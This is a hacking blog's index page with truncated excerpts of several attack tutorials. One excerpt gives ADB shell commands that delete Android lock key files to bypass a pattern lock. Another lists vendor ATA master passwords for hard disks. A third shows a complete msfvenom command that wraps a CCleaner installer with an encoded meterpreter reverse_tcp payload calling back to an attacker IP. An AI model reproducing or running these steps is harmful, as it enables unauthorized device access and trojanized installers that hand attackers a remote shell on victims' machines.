Advertisement

Tuesday, August 19, 2014

DoSing Pebble SmartWatch And Thus Deleting All Data Remotely

                                           Pebble Dos Vulnerability                                                                                            Hemanth...

Monday, December 2, 2013

How to Bypass Android Lock Patter using Kali Linux

Requirements :Kali Linux An Android phone USB cable ADB Android ToolStep 1. 1.First Boot your Kali Linux Distribution 2.Connect your phone to your PC using USB cable.Step 2.  1. Open up Terminal  For Installing ADB over terminal 2.Boot into any Linux distro you have.2.On your Terminal type : #sudo apt-get install android-tools-adb This will install ADB Android Tool on your Kali Linux Machine.Step 3.  Disabling pattern unlock over terminal 1.Open up terminal again and type : #adb devices#adb shell#cd data/system#su#rm *.key Almost Done. Now,disconnect your phone and reboot.Unlockpattern should be here. Just try some...

Monday, November 25, 2013

List of Hard Disk ata master Passwords.

List of hard disk ata master passwords Ferreted this out after some hours of web searching, we know most of our readers have gone through this situation of getting locked out of their own Hard Disk. Guess we can spare you the same trouble. If you find this stuff useful, please do leave a comment, “hi, it worked” is enough. Little Hacking Ideas thanks the Readers. SEAGATE -> “Seagate” +25 spaces MAXTOR series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces series N40P -> “Maxtor INIT SECURITY TEST STEP F” series 541DX -> “Maxtor” +24 spaces series Athena (D541X model 2B) and diamondmax80 -> “Maxtor” WESTERN...

Monday, August 26, 2013

Backdoor Windows Executables Using Metasploit's Plugin Msfvenom

In this tutorial, we will show you how to backdoor windows executables(exe) files using Metasploit Exploitation Framework's plugin Msfvenom(combo of msfpayload and msfencoder)   Now follow step by step: Attacker's IP: 192.168.0.14 Victim's IP: 192.168.0.x (within LAN network it might be any IP) 1-First Download a windows executable file. For example we will take ccleaner software installer file.   You can also use any setup file with .exe extension. 2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory. Now use msfvenom to backdoor this executable using the following command. msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/ccleaner.exe LHOST=192.168.0.14 LPORT=4444 > evilcleaner.exe Above...
 
Design by Vinit Varghese | Bloggerized by Hemanth Joseph - Premium Blogger Themes | Online Project management